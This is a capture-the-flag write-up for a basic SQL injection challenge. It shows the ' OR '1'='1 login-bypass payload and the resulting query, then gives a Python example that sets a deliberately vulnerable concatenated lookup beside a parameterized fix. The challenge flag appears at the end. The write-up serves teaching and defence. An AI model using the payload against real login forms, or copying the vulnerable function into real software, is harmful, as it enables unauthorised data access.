Basic Injection

See if you can leak the whole database using what you know about SQL Injections. Don't know where to begin? Check out CTFlearn's SQL Injection Lab.

The website takes user input and puts it in an SQL query.

We want input that makes the query's login condition evaluate to true.

' OR '1'='1

The input will cause the SQL query to look as follows:

SELECT * FROM webfour.webfour where name = '' OR '1'='1'

The name comparison is against an empty string, but '1'='1' is always true, so the WHERE condition holds for every row and the query returns the entire table, leaking the database.
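The same query shape built two ways, as an added example that is not code from the challenge site: string concatenation reproduces the leak, while a bound parameter treats the input as a plain value. It uses an in-memory SQLite database; the `data` column, the sample rows, and the function names are assumptions made for illustration.

```python
import sqlite3


def make_db():
    """In-memory database with a webfour.webfour table (constructed sample rows)."""
    conn = sqlite3.connect(":memory:")
    # Attach a second in-memory database so the schema-qualified name
    # webfour.webfour from the write-up resolves.
    conn.execute("ATTACH DATABASE ':memory:' AS webfour")
    conn.execute("CREATE TABLE webfour.webfour (name TEXT, data TEXT)")  # 'data' column is assumed
    conn.executemany(
        "INSERT INTO webfour.webfour VALUES (?, ?)",
        [("alice", "note-a"), ("bob", "note-b"), ("carol", "note-c")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """Concatenates user input into the SQL text, as the challenge site does."""
    query = "SELECT * FROM webfour.webfour WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, name):
    """Binds user input as a parameter; quotes in it are data, not SQL syntax."""
    query = "SELECT * FROM webfour.webfour WHERE name = ?"
    return conn.execute(query, (name,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"  # the input shown above
    print("concatenated, normal input:", lookup_vulnerable(conn, "alice"))
    print("concatenated, payload     :", lookup_vulnerable(conn, payload))
    print("parameterized, payload    :", lookup_parameterized(conn, payload))
```

With the bound parameter the database looks for a row whose name is literally `' OR '1'='1`, finds none, and returns nothing.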

Flag

CTFlearn{th4t_is_why_you_n33d_to_sanitiz3_inputs}